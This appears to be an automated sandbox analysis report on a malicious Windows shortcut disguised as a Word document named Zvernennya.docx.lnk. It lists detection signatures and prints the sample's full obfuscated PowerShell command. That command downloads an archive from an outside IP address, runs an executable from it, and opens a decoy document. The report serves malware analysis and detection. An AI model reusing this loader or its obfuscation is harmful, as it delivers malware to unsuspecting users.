Windows
Analysis Report
Zvernennya.docx.lnk
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
powershell.exe (PID: 7484 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -win 1 eCh O DtavXKBK fXVHqPXRVE uVIPLEyxSP HoKFBlIKji iHsEhnHhR; if (-not( Test-Path 'avast.z'' i''p' -Pat hType Leaf )){&(Get-C ommand in? ??e-webr** ) -uri ht' 'tp'':/''/ 1''46''.1' '85''.2''3 9''.1''0/a vast.z''i' 'p -OutFil e avast.z' 'i''p}; sl eep 0.01; Measure-Ob ject | Out -Null; eCh O WTnawPfE NZdkUENXjl pINcyhdJtk YBSFpQNIqO uHamGgTznP haVGDmHoId oX; $Hehe = 'Expand- Archive -P ath avast. z''i''p -D estination Path x64Up dtr'; iex -Debug -Ve rbose -Err orVariable $e -Infor mationActi on Ignore -WarningAc tion Inqui re $Hehe; eChO lvSVU DxPGUqlwAO wXchHhjWJy KnZkqyOSU; $NotHehe = 'st''ar' 't x64Updt r/ABSchedh lp.e''x''e '; eChO Ki dSuyVnxDkS BubVQlNVHy DeH; iex - Debug -Ver bose -Erro rVariable $ee -Infor mationActi on Ignore -WarningAc tion Inqui re $NotHeh e; &(Get-C ommand in? ??e-webre* ********** ********** ***) -uri ht''tp'':/ ''/1''46'' .1''85''.2 ''39''.1'' 0/burka/Zv ernennya.d ocx -OutFi le Zvernen nya.docx; sleep 0.01 ; Get-Proc ess | Out- Null; eChO QVBlejalZ jCInUcBtMA u; st''ar' 't Zvernen nya.docx; eChO dTOIn NAdpCKpmsU NxuyyLqhNO nFFBzxsunU EmOanDJdYf feqTLBGSlO FcVSC MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7500 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |